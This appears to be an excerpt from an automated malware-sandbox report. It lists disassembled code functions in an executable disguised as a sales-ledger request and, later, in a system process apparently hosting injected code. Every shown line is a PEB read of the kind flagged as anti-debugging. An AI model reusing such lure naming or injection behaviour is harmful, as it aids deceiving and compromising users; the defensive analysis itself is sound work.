Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F9240 mov eax, dword ptr fs:[00000030h] 24_2_011F9240
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F9240 mov eax, dword ptr fs:[00000030h] 24_2_011F9240
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012BEA55 mov eax, dword ptr fs:[00000030h] 24_2_012BEA55
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01284257 mov eax, dword ptr fs:[00000030h] 24_2_01284257
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0120AAB0 mov eax, dword ptr fs:[00000030h] 24_2_0120AAB0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0120AAB0 mov eax, dword ptr fs:[00000030h] 24_2_0120AAB0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122FAB0 mov eax, dword ptr fs:[00000030h] 24_2_0122FAB0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122D294 mov eax, dword ptr fs:[00000030h] 24_2_0122D294
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122D294 mov eax, dword ptr fs:[00000030h] 24_2_0122D294
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F52A5 mov eax, dword ptr fs:[00000030h] 24_2_011F52A5
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F52A5 mov eax, dword ptr fs:[00000030h] 24_2_011F52A5
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F52A5 mov eax, dword ptr fs:[00000030h] 24_2_011F52A5
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F52A5 mov eax, dword ptr fs:[00000030h] 24_2_011F52A5
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F52A5 mov eax, dword ptr fs:[00000030h] 24_2_011F52A5
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01222AE4 mov eax, dword ptr fs:[00000030h] 24_2_01222AE4
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01222ACB mov eax, dword ptr fs:[00000030h] 24_2_01222ACB
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0127A537 mov eax, dword ptr fs:[00000030h] 24_2_0127A537
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012BE539 mov eax, dword ptr fs:[00000030h] 24_2_012BE539
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h] 24_2_01203D34
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h] 24_2_01203D34
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h] 24_2_01203D34
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h] 24_2_01203D34
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h] 24_2_01203D34
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h] 24_2_01203D34
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h] 24_2_01203D34
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h] 24_2_01203D34
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h] 24_2_01203D34
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h] 24_2_01203D34
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h] 24_2_01203D34
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h] 24_2_01203D34
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h] 24_2_01203D34
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C8D34 mov eax, dword ptr fs:[00000030h] 24_2_012C8D34
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01224D3B mov eax, dword ptr fs:[00000030h] 24_2_01224D3B
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01224D3B mov eax, dword ptr fs:[00000030h] 24_2_01224D3B
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01224D3B mov eax, dword ptr fs:[00000030h] 24_2_01224D3B
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011FAD30 mov eax, dword ptr fs:[00000030h] 24_2_011FAD30
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121C577 mov eax, dword ptr fs:[00000030h] 24_2_0121C577
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121C577 mov eax, dword ptr fs:[00000030h] 24_2_0121C577
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01233D43 mov eax, dword ptr fs:[00000030h] 24_2_01233D43
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01273540 mov eax, dword ptr fs:[00000030h] 24_2_01273540
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012A3D40 mov eax, dword ptr fs:[00000030h] 24_2_012A3D40
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01217D50 mov eax, dword ptr fs:[00000030h] 24_2_01217D50
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C05AC mov eax, dword ptr fs:[00000030h] 24_2_012C05AC
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C05AC mov eax, dword ptr fs:[00000030h] 24_2_012C05AC
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012235A1 mov eax, dword ptr fs:[00000030h] 24_2_012235A1
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F2D8A mov eax, dword ptr fs:[00000030h] 24_2_011F2D8A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F2D8A mov eax, dword ptr fs:[00000030h] 24_2_011F2D8A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F2D8A mov eax, dword ptr fs:[00000030h] 24_2_011F2D8A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F2D8A mov eax, dword ptr fs:[00000030h] 24_2_011F2D8A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F2D8A mov eax, dword ptr fs:[00000030h] 24_2_011F2D8A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01221DB5 mov eax, dword ptr fs:[00000030h] 24_2_01221DB5
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01221DB5 mov eax, dword ptr fs:[00000030h] 24_2_01221DB5
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01221DB5 mov eax, dword ptr fs:[00000030h] 24_2_01221DB5
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01222581 mov eax, dword ptr fs:[00000030h] 24_2_01222581
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01222581 mov eax, dword ptr fs:[00000030h] 24_2_01222581
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01222581 mov eax, dword ptr fs:[00000030h] 24_2_01222581
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01222581 mov eax, dword ptr fs:[00000030h] 24_2_01222581
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122FD9B mov eax, dword ptr fs:[00000030h] 24_2_0122FD9B
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122FD9B mov eax, dword ptr fs:[00000030h] 24_2_0122FD9B
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0120D5E0 mov eax, dword ptr fs:[00000030h] 24_2_0120D5E0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0120D5E0 mov eax, dword ptr fs:[00000030h] 24_2_0120D5E0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012BFDE2 mov eax, dword ptr fs:[00000030h] 24_2_012BFDE2
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012BFDE2 mov eax, dword ptr fs:[00000030h] 24_2_012BFDE2
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012BFDE2 mov eax, dword ptr fs:[00000030h] 24_2_012BFDE2
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012BFDE2 mov eax, dword ptr fs:[00000030h] 24_2_012BFDE2
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012A8DF1 mov eax, dword ptr fs:[00000030h] 24_2_012A8DF1
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01276DC9 mov eax, dword ptr fs:[00000030h] 24_2_01276DC9
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01276DC9 mov eax, dword ptr fs:[00000030h] 24_2_01276DC9
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01276DC9 mov eax, dword ptr fs:[00000030h] 24_2_01276DC9
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01276DC9 mov ecx, dword ptr fs:[00000030h] 24_2_01276DC9
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01276DC9 mov eax, dword ptr fs:[00000030h] 24_2_01276DC9
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01276DC9 mov eax, dword ptr fs:[00000030h] 24_2_01276DC9
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122BC2C mov eax, dword ptr fs:[00000030h] 24_2_0122BC2C
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C740D mov eax, dword ptr fs:[00000030h] 24_2_012C740D
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C740D mov eax, dword ptr fs:[00000030h] 24_2_012C740D
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C740D mov eax, dword ptr fs:[00000030h] 24_2_012C740D
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h] 24_2_012B1C06
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h] 24_2_012B1C06
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h] 24_2_012B1C06
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h] 24_2_012B1C06
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h] 24_2_012B1C06
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h] 24_2_012B1C06
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h] 24_2_012B1C06
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h] 24_2_012B1C06
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h] 24_2_012B1C06
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h] 24_2_012B1C06
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h] 24_2_012B1C06
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h] 24_2_012B1C06
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h] 24_2_012B1C06
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h] 24_2_012B1C06
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01276C0A mov eax, dword ptr fs:[00000030h] 24_2_01276C0A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01276C0A mov eax, dword ptr fs:[00000030h] 24_2_01276C0A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01276C0A mov eax, dword ptr fs:[00000030h] 24_2_01276C0A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01276C0A mov eax, dword ptr fs:[00000030h] 24_2_01276C0A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121746D mov eax, dword ptr fs:[00000030h] 24_2_0121746D
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122A44B mov eax, dword ptr fs:[00000030h] 24_2_0122A44B
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0128C450 mov eax, dword ptr fs:[00000030h] 24_2_0128C450
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0128C450 mov eax, dword ptr fs:[00000030h] 24_2_0128C450
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0120849B mov eax, dword ptr fs:[00000030h] 24_2_0120849B
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B14FB mov eax, dword ptr fs:[00000030h] 24_2_012B14FB
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01276CF0 mov eax, dword ptr fs:[00000030h] 24_2_01276CF0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01276CF0 mov eax, dword ptr fs:[00000030h] 24_2_01276CF0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01276CF0 mov eax, dword ptr fs:[00000030h] 24_2_01276CF0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C8CD6 mov eax, dword ptr fs:[00000030h] 24_2_012C8CD6
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122E730 mov eax, dword ptr fs:[00000030h] 24_2_0122E730
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C070D mov eax, dword ptr fs:[00000030h] 24_2_012C070D
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C070D mov eax, dword ptr fs:[00000030h] 24_2_012C070D
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122A70E mov eax, dword ptr fs:[00000030h] 24_2_0122A70E
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122A70E mov eax, dword ptr fs:[00000030h] 24_2_0122A70E
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F4F2E mov eax, dword ptr fs:[00000030h] 24_2_011F4F2E
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F4F2E mov eax, dword ptr fs:[00000030h] 24_2_011F4F2E
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121F716 mov eax, dword ptr fs:[00000030h] 24_2_0121F716
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0128FF10 mov eax, dword ptr fs:[00000030h] 24_2_0128FF10
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0128FF10 mov eax, dword ptr fs:[00000030h] 24_2_0128FF10
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0120FF60 mov eax, dword ptr fs:[00000030h] 24_2_0120FF60
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C8F6A mov eax, dword ptr fs:[00000030h] 24_2_012C8F6A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0120EF40 mov eax, dword ptr fs:[00000030h] 24_2_0120EF40
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01277794 mov eax, dword ptr fs:[00000030h] 24_2_01277794
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01277794 mov eax, dword ptr fs:[00000030h] 24_2_01277794
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01277794 mov eax, dword ptr fs:[00000030h] 24_2_01277794
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01208794 mov eax, dword ptr fs:[00000030h] 24_2_01208794
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012337F5 mov eax, dword ptr fs:[00000030h] 24_2_012337F5
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012AFE3F mov eax, dword ptr fs:[00000030h] 24_2_012AFE3F
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011FC600 mov eax, dword ptr fs:[00000030h] 24_2_011FC600
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011FC600 mov eax, dword ptr fs:[00000030h] 24_2_011FC600
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011FC600 mov eax, dword ptr fs:[00000030h] 24_2_011FC600
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01228E00 mov eax, dword ptr fs:[00000030h] 24_2_01228E00
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B1608 mov eax, dword ptr fs:[00000030h] 24_2_012B1608
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122A61C mov eax, dword ptr fs:[00000030h] 24_2_0122A61C
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122A61C mov eax, dword ptr fs:[00000030h] 24_2_0122A61C
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011FE620 mov eax, dword ptr fs:[00000030h] 24_2_011FE620
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0120766D mov eax, dword ptr fs:[00000030h] 24_2_0120766D
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121AE73 mov eax, dword ptr fs:[00000030h] 24_2_0121AE73
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121AE73 mov eax, dword ptr fs:[00000030h] 24_2_0121AE73
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121AE73 mov eax, dword ptr fs:[00000030h] 24_2_0121AE73
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121AE73 mov eax, dword ptr fs:[00000030h] 24_2_0121AE73
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121AE73 mov eax, dword ptr fs:[00000030h] 24_2_0121AE73
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01207E41 mov eax, dword ptr fs:[00000030h] 24_2_01207E41
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01207E41 mov eax, dword ptr fs:[00000030h] 24_2_01207E41
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01207E41 mov eax, dword ptr fs:[00000030h] 24_2_01207E41
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01207E41 mov eax, dword ptr fs:[00000030h] 24_2_01207E41
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01207E41 mov eax, dword ptr fs:[00000030h] 24_2_01207E41
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01207E41 mov eax, dword ptr fs:[00000030h] 24_2_01207E41
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012BAE44 mov eax, dword ptr fs:[00000030h] 24_2_012BAE44
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012BAE44 mov eax, dword ptr fs:[00000030h] 24_2_012BAE44
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012746A7 mov eax, dword ptr fs:[00000030h] 24_2_012746A7
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C0EA5 mov eax, dword ptr fs:[00000030h] 24_2_012C0EA5
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C0EA5 mov eax, dword ptr fs:[00000030h] 24_2_012C0EA5
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C0EA5 mov eax, dword ptr fs:[00000030h] 24_2_012C0EA5
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0128FE87 mov eax, dword ptr fs:[00000030h] 24_2_0128FE87
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012216E0 mov ecx, dword ptr fs:[00000030h] 24_2_012216E0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012076E2 mov eax, dword ptr fs:[00000030h] 24_2_012076E2
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01238EC7 mov eax, dword ptr fs:[00000030h] 24_2_01238EC7
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012AFEC0 mov eax, dword ptr fs:[00000030h] 24_2_012AFEC0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012236CC mov eax, dword ptr fs:[00000030h] 24_2_012236CC
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C8ED6 mov eax, dword ptr fs:[00000030h] 24_2_012C8ED6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D98CD6 mov eax, dword ptr fs:[00000030h] 32_2_04D98CD6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D814FB mov eax, dword ptr fs:[00000030h] 32_2_04D814FB
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D46CF0 mov eax, dword ptr fs:[00000030h] 32_2_04D46CF0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D46CF0 mov eax, dword ptr fs:[00000030h] 32_2_04D46CF0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D46CF0 mov eax, dword ptr fs:[00000030h] 32_2_04D46CF0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CD849B mov eax, dword ptr fs:[00000030h] 32_2_04CD849B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CFA44B mov eax, dword ptr fs:[00000030h] 32_2_04CFA44B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D5C450 mov eax, dword ptr fs:[00000030h] 32_2_04D5C450
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D5C450 mov eax, dword ptr fs:[00000030h] 32_2_04D5C450
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE746D mov eax, dword ptr fs:[00000030h] 32_2_04CE746D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D9740D mov eax, dword ptr fs:[00000030h] 32_2_04D9740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D9740D mov eax, dword ptr fs:[00000030h] 32_2_04D9740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D9740D mov eax, dword ptr fs:[00000030h] 32_2_04D9740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h] 32_2_04D81C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h] 32_2_04D81C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h] 32_2_04D81C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h] 32_2_04D81C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h] 32_2_04D81C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h] 32_2_04D81C06
